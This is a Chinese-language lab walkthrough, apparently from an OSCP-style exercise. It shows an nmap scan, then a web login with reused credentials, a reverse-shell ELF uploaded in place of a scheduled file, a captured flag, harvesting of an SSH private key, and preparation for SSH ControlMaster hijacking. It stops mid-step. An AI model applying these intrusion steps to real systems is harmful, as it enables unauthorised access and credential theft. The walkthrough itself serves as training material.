命令:nmap -A -Pn 192.168.243.172

Nmap initial output

Nmap scan report for 192.168.243.172
Host is up (0.21s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5f:05:52:08:c6:45:b7:3b:9b:ae:f4:da:12:e0:2f:10 (RSA)
|   256 dd:e2:b9:d3:92:3e:ac:12:e2:a7:fd:36:75:d8:60:88 (ECDSA)
|_  256 b0:0a:6f:c0:e8:71:8b:9a:91:c0:fc:7d:67:48:69:a5 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
Aggressive OS guesses: Linux 4.15 - 5.6 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   205.19 ms 192.168.49.1
2   205.17 ms 192.168.243.172

利用192.168.243.171得到的账户密码,登录**http://192.168.243.173:8082/ui/login/**

07.png

登录成功之后,发现一个疑似可以上传elf文件的地方:

08.png

里面存在一个tpsreports.elf,尝试将第一步生成的rev.elf上传,没有反应,重命名为tpsreports.elf再次上传,等一会,得到反弹shell:

10.png

得到第二个flag:58736c6c295a9197ece6762369769108

ls -alh查看nottodd目录下的文件,发现.bash_history,查看找到一些有意思的记录:

11.png

保存获取的id_rsa私钥文件内容:

12.png

kali尝试免密登录失败。

查看.ssh下的config文件,参考教材P535,SSH Hijacking with ControlMaster。

13.png

查看定时任务:nottodd@cb2:/home/nottodd/.ssh$ crontab -l

14.png

每五分钟查看/home/nottodd/.ssh/controlmaster目录下是否有新生成的文件: